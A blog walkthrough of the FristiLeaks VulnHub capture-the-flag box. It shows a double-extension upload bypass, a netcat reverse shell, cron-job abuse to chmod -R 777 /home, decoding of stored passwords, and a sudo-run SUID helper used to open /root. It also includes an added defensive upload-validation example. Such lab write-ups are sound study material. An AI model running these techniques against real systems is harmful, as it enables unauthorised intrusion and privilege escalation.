30 March 2023

Pentesting Fun Stuff

following the cyber security path…

FristiLeaks

This is the second box on my list to work through. As I mentioned earlier, this list consists of old boxes, but they can still form a good challenge to work up to the OSCP.

Recon

Starting with an nmap scan to find out which ports are open and what public-facing services are running on the system.

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods: 
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries 
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

Port 80 with a webserver running behind it. The version of the webserver is Apache 2.2.15.
Nmap has guessed that the OS is CentOS.

There are some entries in the robots.txt file, but before I investigate the website, I’m going to check the known vulnerabilities of the Apache version.

┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # searchsploit apache 2.2.15
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                           |  Path
                                                                                                                                                                         | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass                                                                                                                  | exploits/linux/remote/36663.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Webserver

The main page of the website has some names of the hackers behind Fristileaks and in the source there is a comment:

<!-- Welcome to #Fristleaks, a quick hackme VM by @Ar0xA

Goal: get UID 0 (root) and read the special flag file.
Timeframe: should be doable in 4 hours.
-->

The 3 entries in the robots.txt file all point to the same picture, which looks like a red herring. Just to be sure I check the picture for metadata or other hidden data, but I can’t find anything.

Time to run dirsearch and brute-force the website in the hope of finding more files/folders.
Nothing… very frustrating. I tried different wordlists, but all came back with the same results. Only the 3 drinks. I really cracked my head over it, until it dawned on me that the 3 drinks were a hint and the main page was the answer. There was one drink that wasn’t in any of my lists, mostly because it is a particular Dutch drink… fristi

The result was an admin portal with some comments.

<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">
<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
-->
<!-- [base64-encoded PNG image data omitted] -->

There are several ways to decode this base64 comment. As it is an encoded PNG file, I just replace the existing inline picture on the site with this piece of data. The result is a picture with a string of letters: keKkeKKeKKeKkEkkEk

A password? But what about the username? In the comment above there is a name: eezeepz
This username combined with the password gives me access to a page with an upload possibility.
Will it let me upload anything?

Sorry, is not a valid file. Only allowed are: png,jpg,gif
Sorry, file not uploaded 

So it won’t let me upload a PHP file. Will it let me upload a file with the extension php.jpg?

Uploading, please wait
The file has been uploaded to /uploads

Yes, it will. Now to start up a listener and run the file from the browser.

┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # nc -lvnp 9999
listening on [any] 9999 ...

The file can be found in /fristi/uploads/shell.php.jpg

┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # nc -lvnp 9999
listening on [any] 9999 ...
connect to [192.168.50.130] from (UNKNOWN) [192.168.50.134] 47595
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 17:17:45 up  1:05,  0 users,  load average: 0.00, 0.01, 0.20
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$ 
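The upload filter accepted shell.php.jpg because it only judged the trailing suffix; on an Apache 2.2 host where PHP is wired up with AddHandler (as in the php.conf shipped with that mod_php), a .php segment anywhere in the name still reaches the PHP handler, so an allow-list on the last extension is not a sufficient control. As an added example (not the box's own upload code, which is not shown on the page; the weak check is a hypothetical reconstruction of the observed behaviour), this Python contrasts that check with a stricter one that rejects multi-extension names, verifies magic bytes and never reuses the client's file name:

```python
import hashlib
import re
from typing import Optional

# Allow-list quoted by the upload page: png,jpg,gif
ALLOWED_EXT = {"png", "jpg", "gif"}

# Magic bytes each allowed format must start with.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def weak_check(filename: str) -> bool:
    """Hypothetical reconstruction of the box's behaviour: only the last
    suffix is compared, so 'shell.php.jpg' is accepted."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXT


def strict_check(filename: str, data: bytes) -> bool:
    """Accept only '<basename>.<ext>' with exactly one extension, a plain
    basename, an allow-listed extension and content whose magic matches."""
    parts = filename.split(".")
    if len(parts) != 2:  # rejects shell.php.jpg, .htaccess, ../x.png
        return False
    base, ext = parts[0], parts[1].lower()
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", base):
        return False
    if ext not in ALLOWED_EXT:
        return False
    return any(data.startswith(m) for m in MAGIC[ext])


def stored_name(filename: str, data: bytes) -> Optional[str]:
    """Server-chosen name for an accepted upload (content hash plus the
    validated extension); None when the upload is rejected."""
    if not strict_check(filename, data):
        return None
    ext = filename.split(".")[1].lower()
    return hashlib.sha256(data).hexdigest()[:16] + "." + ext


if __name__ == "__main__":
    # Constructed sample inputs, not files from the box.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print(weak_check("shell.php.jpg"))          # True: the bypass seen above
    print(strict_check("shell.php.jpg", png))   # False: two extensions
    print(stored_name("logo.png", png))         # hash-based name + .png
```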

A good place to start is the www folder, to look for things I’ve missed.

sh-4.1$ cd /var/www
cd /var/www
sh-4.1$ ls -lah
ls -lah
total 28K
drwxr-xr-x.  6 root root 4.0K Nov 17  2015 .
drwxr-xr-x. 19 root root 4.0K Nov 19  2015 ..
drwxr-xr-x.  2 root root 4.0K Aug 24  2015 cgi-bin
drwxr-xr-x.  3 root root 4.0K Nov 17  2015 error
drwxr-xr-x.  7 root root 4.0K Nov 25  2015 html
drwxr-xr-x.  3 root root 4.0K Nov 17  2015 icons
-rw-r--r--   1 root root   98 Nov 17  2015 notes.txt

There is a file called notes.txt:

sh-4.1$ cat notes.txt
cat notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.

-jerry

In the home directory of user eezeepz there is a note:

sh-4.1$ cat /home/eezeepz/notes.txt
cat /home/eezeepz/notes.txt
Yo EZ,

I made it possible for you to do some automated checks, 
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my 
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The 
output goes to the file "cronresult" in /tmp/. It should 
run every minute with my account privileges.

- Jerry

Ok, so I can try to use chmod to make the other home folders readable. An important detail in the note is that the full path to each binary is required. So in this case I try /usr/bin/chmod

sh-4.1$ echo "/usr/bin/chmod -R 777 /home/" > runthis
echo "/home/admin/chmod -R 777 /home/" > runthis

After a minute I check /home and it seems like it worked.

sh-4.1$ ls -lah /home
ls -lah /home
total 28K
drwxr-xr-x.  5 root      root      4.0K Nov 19  2015 .
dr-xr-xr-x. 22 root      root      4.0K May 27 16:11 ..
drwxrwxrwx.  2 admin     admin     4.0K Nov 19  2015 admin
drwx---r-x.  5 eezeepz   eezeepz    12K Nov 18  2015 eezeepz
drwx------   2 fristigod fristigod 4.0K Nov 19  2015 fristigod
sh-4.1$ ls -lah
ls -lah
total 652K
drwxrwxrwx. 2 admin     admin     4.0K Nov 19  2015 .
drwxr-xr-x. 5 root      root      4.0K Nov 19  2015 ..
-rwxrwxrwx. 1 admin     admin       18 Sep 22  2015 .bash_logout
-rwxrwxrwx. 1 admin     admin      176 Sep 22  2015 .bash_profile
-rwxrwxrwx. 1 admin     admin      124 Sep 22  2015 .bashrc
-rwxrwxrwx  1 admin     admin      45K Nov 18  2015 cat
-rwxrwxrwx  1 admin     admin      48K Nov 18  2015 chmod
-rwxrwxrwx  1 admin     admin      737 Nov 18  2015 cronjob.py
-rwxrwxrwx  1 admin     admin       21 Nov 18  2015 cryptedpass.txt
-rwxrwxrwx  1 admin     admin      258 Nov 18  2015 cryptpass.py
-rwxrwxrwx  1 admin     admin      89K Nov 18  2015 df
-rwxrwxrwx  1 admin     admin      24K Nov 18  2015 echo
-rwxrwxrwx  1 admin     admin     160K Nov 18  2015 egrep
-rwxrwxrwx  1 admin     admin     160K Nov 18  2015 grep
-rwxrwxrwx  1 admin     admin      84K Nov 18  2015 ps
-rw-r--r--  1 fristigod fristigod   25 Nov 19  2015 whoisyourgodnow.txt

A few Python scripts and text files. Let’s look at the text file from fristigod.

sh-4.1$ cat whoisyourgodnow.txt 
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

Hmmm. What about the other text file?

sh-4.1$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

It isn’t base64. So let’s take a look at the Python scripts.

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

It takes a string, base64-encodes it, reverses the result and finally applies rot13.
To make the stored values readable again, I need to undo these steps in reverse order. For this I can use a bash one-liner.

┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # echo mVGZ3O3omkJLmy2pcuTq | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev | base64 -d
thisisalsopw123
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # echo =RFn0AKnlMHMPIzpyuTI0ITG | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev | base64 -d
LetThereBeFristi!
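The same inversion in Python 3, as an added example that is not part of the original post or the box: it re-implements encodeString from cryptpass.py, adds the inverse, and checks both ciphertexts recovered from /home/admin (the leading "=" of the second one is just base64 padding that ended up at the front after the reversal).

```python
import base64
import codecs


def encode_string(plaintext: str) -> str:
    """Python 3 port of cryptpass.py: base64-encode, reverse, rot13."""
    b64 = base64.b64encode(plaintext.encode()).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def decode_string(ciphertext: str) -> str:
    """Inverse of encode_string: rot13 is its own inverse, reversing
    restores the base64 order (padding returns to the end), then decode."""
    b64 = codecs.decode(ciphertext.strip(), "rot13")[::-1]
    return base64.b64decode(b64).decode()


# The two values found on the box.
FOUND = {
    "cryptedpass.txt": "mVGZ3O3omkJLmy2pcuTq",
    "whoisyourgodnow.txt": "=RFn0AKnlMHMPIzpyuTI0ITG",
}


def decode_all(found: dict) -> dict:
    """Decode every stored value and verify it round-trips."""
    result = {}
    for name, ciphertext in found.items():
        plaintext = decode_string(ciphertext)
        # Re-encoding must reproduce the original, or the scheme was misread.
        if encode_string(plaintext) != ciphertext:
            raise ValueError(f"round-trip mismatch for {name}")
        result[name] = plaintext
    return result


if __name__ == "__main__":
    for name, pw in decode_all(FOUND).items():
        print(f"{name}: {pw}")
```

This is an encoding, not encryption: anyone who can read the files and the script can recover the passwords, which is why the box hands them over this easily.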

Ok. Let’s see if this is a password.

sh-4.1$ python -c 'import pty;pty.spawn("/bin/sh");'
python -c 'import pty;pty.spawn("/bin/sh");'
sh-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!

bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
bash-4.1$ cd /home
cd /home
bash-4.1$ ls
ls
admin  eezeepz  fristigod
bash-4.1$ cd fristigod
cd fristigod
bash-4.1$ ls -lah
ls -lah
total 20K
drwx------  2 fristigod fristigod 4.0K Nov 19  2015 .
drwxr-xr-x. 5 root      root      4.0K Nov 19  2015 ..
-rw-r--r--  1 fristigod fristigod   18 Sep 22  2015 .bash_logout
-rw-r--r--  1 fristigod fristigod  176 Sep 22  2015 .bash_profile
-rw-r--r--  1 fristigod fristigod  124 Sep 22  2015 .bashrc

Nothing… but as we could see in /etc/passwd, the home folder is located in /var/fristigod.

bash-4.1$ cd /var/fristigod
cd /var/fristigod
bash-4.1$ ls -lah
ls -lah
total 16K
drwxr-x---   3 fristigod fristigod 4.0K Nov 25  2015 .
drwxr-xr-x. 19 root      root      4.0K Nov 19  2015 ..
-rw-------   1 fristigod fristigod  864 Nov 25  2015 .bash_history
drwxrwxr-x.  2 fristigod fristigod 4.0K Nov 25  2015 .secret_admin_stuff
bash-4.1$ cd .secret_admin_stuff
cd .secret_admin_stuff
bash-4.1$ ls -lah
ls -lah
total 16K
drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25  2015 .
drwxr-x---  3 fristigod fristigod 4.0K Nov 25  2015 ..
-rwsr-sr-x  1 root      root      7.4K Nov 25  2015 doCom
bash-4.1$ file doCom
file doCom
doCom: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

An ELF file with the SUID/SGID bits set.

bash-4.1$ ./doCom
./doCom
Nice try, but wrong user ;)

Hahaha….bummer.

bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!

Matching Defaults entries for fristigod on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ sudo -u fristi ./doCom
sudo -u fristi ./doCom
Usage: ./program_name terminal_command ...

So I can run the file as fristi.

bash-4.1$ sudo -u fristi ./doCom touch /var/fristigod/test.tmp
sudo -u fristi ./doCom touch /var/fristigod/test.tmp
bash-4.1$ ls -lah /var/fristigod
ls -lah /var/fristigod
total 16K
drwxr-x---   3 fristigod fristigod 4.0K May 27 18:31 .
drwxr-xr-x. 19 root      root      4.0K Nov 19  2015 ..
-rw-------   1 fristigod fristigod  864 Nov 25  2015 .bash_history
drwxrwxr-x.  2 fristigod fristigod 4.0K Nov 25  2015 .secret_admin_stuff
-rw-r--r--   1 root      users        0 May 27 18:31 test.tmp

Nice.

bash-4.1$ sudo -u fristi ./doCom chmod -R 777 /root
sudo -u fristi ./doCom chmod -R 777 /root
bash-4.1$ ls -lah /root
ls -lah /root
total 48K
drwxrwxrwx.  3 root root 4.0K Nov 25  2015 .
dr-xr-xr-x. 22 root root 4.0K May 27 16:11 ..
-rwxrwxrwx   1 root root 1.9K Nov 25  2015 .bash_history
-rwxrwxrwx.  1 root root   18 May 20  2009 .bash_logout
-rwxrwxrwx.  1 root root  176 May 20  2009 .bash_profile
-rwxrwxrwx.  1 root root  176 Sep 22  2004 .bashrc
drwxrwxrwx.  3 root root 4.0K Nov 25  2015 .c
-rwxrwxrwx.  1 root root  100 Sep 22  2004 .cshrc
-rwxrwxrwx.  1 root root 1.3K Nov 17  2015 .mysql_history
-rwxrwxrwx.  1 root root  129 Dec  3  2004 .tcshrc
-rwxrwxrwx.  1 root root  829 Nov 17  2015 .viminfo
-rwxrwxrwx.  1 root root  246 Nov 17  2015 fristileaks_secrets.txt
bash-4.1$ cat /root/fristileaks_secrets.txt
cat /root/fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)

Flag: Y0u_kn0w_y0u_l0ve_fr1st1

And that was the challenge. Not too difficult and really a good one to try.
